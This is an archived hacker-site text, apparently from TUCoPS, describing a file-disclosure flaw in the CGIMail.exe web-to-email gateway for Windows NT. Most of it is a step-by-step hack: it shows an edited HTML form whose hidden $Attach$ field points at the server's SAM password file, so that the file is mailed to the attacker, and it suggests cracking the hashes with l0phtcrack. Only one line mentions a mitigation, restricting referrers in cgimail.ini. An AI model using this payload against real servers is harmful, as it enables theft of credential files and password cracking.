Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: cgimail.txt

CGIMail.exe for Windows NT Vulnerability




                                CGIMail.exe



CGIMail.exe is a Web to e-mail gateway program written by Stalkerlabs
for a Win32 platform, that is Windows NT or Windows 95. Basically, you
fill in an on-line form and it is e-mailed off. The contents of the form
contains the following :



<form action="/scripts/CGImail.exe" method="POST" NAME="TestForm">

<input type=hidden name="$File$" value="/scripts/template.txt">

<input type=hidden name="$Subject$" value="CGImail Example">

<input type=hidden name="$LocationOK$" value="/ok.html">

<input type=hidden name="$LocationKO$" value="/ko.html">

<input type=hidden name="$To$" value="mnemonix@globalnet.co.uk">

<input type=hidden name="$Optional$" value="mmmh, no!">



There is also another "hidden" input type and this takes the following
shape:



<input type=hidden name="$Attach$" value="">



This allows you to attach a file to the e-mailÖ.any file the
IUSR_COMPUTERNAME account has access to. So if the NT server is poorly
configured as far as security is concerned you could put in
"c:\winnt\repair\sam._" as the inputís value:



<input type=hidden name="$Attach$" value="c:\winnt\repair\sam._">



Note Ė Using %windir% wonít work Ė you need the full path.



So hereís how the hack would go :

You go to their form page and view the source. Save this source to the
desktop and make some editions to it, like put your e-mail address in (use
a temporary one!) and put the $Attach$ entry in. Save these changes and
then load the new page and click o n send.

All things going well you should receive a compressed copy of their SAM
which you can then get to work on, using l0phtcrack to glean the passwords.



CGIMail can be made more secure: the cgimail.ini can be edited so that only
certain referrers are accepted but only around 50% of the machines Iíve
seen with this on have configured it so.



You can find out more (no-hacking) info about this program from the
vendorís site:



http://www.stalkerlab.ch/SMailers/index.html




TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH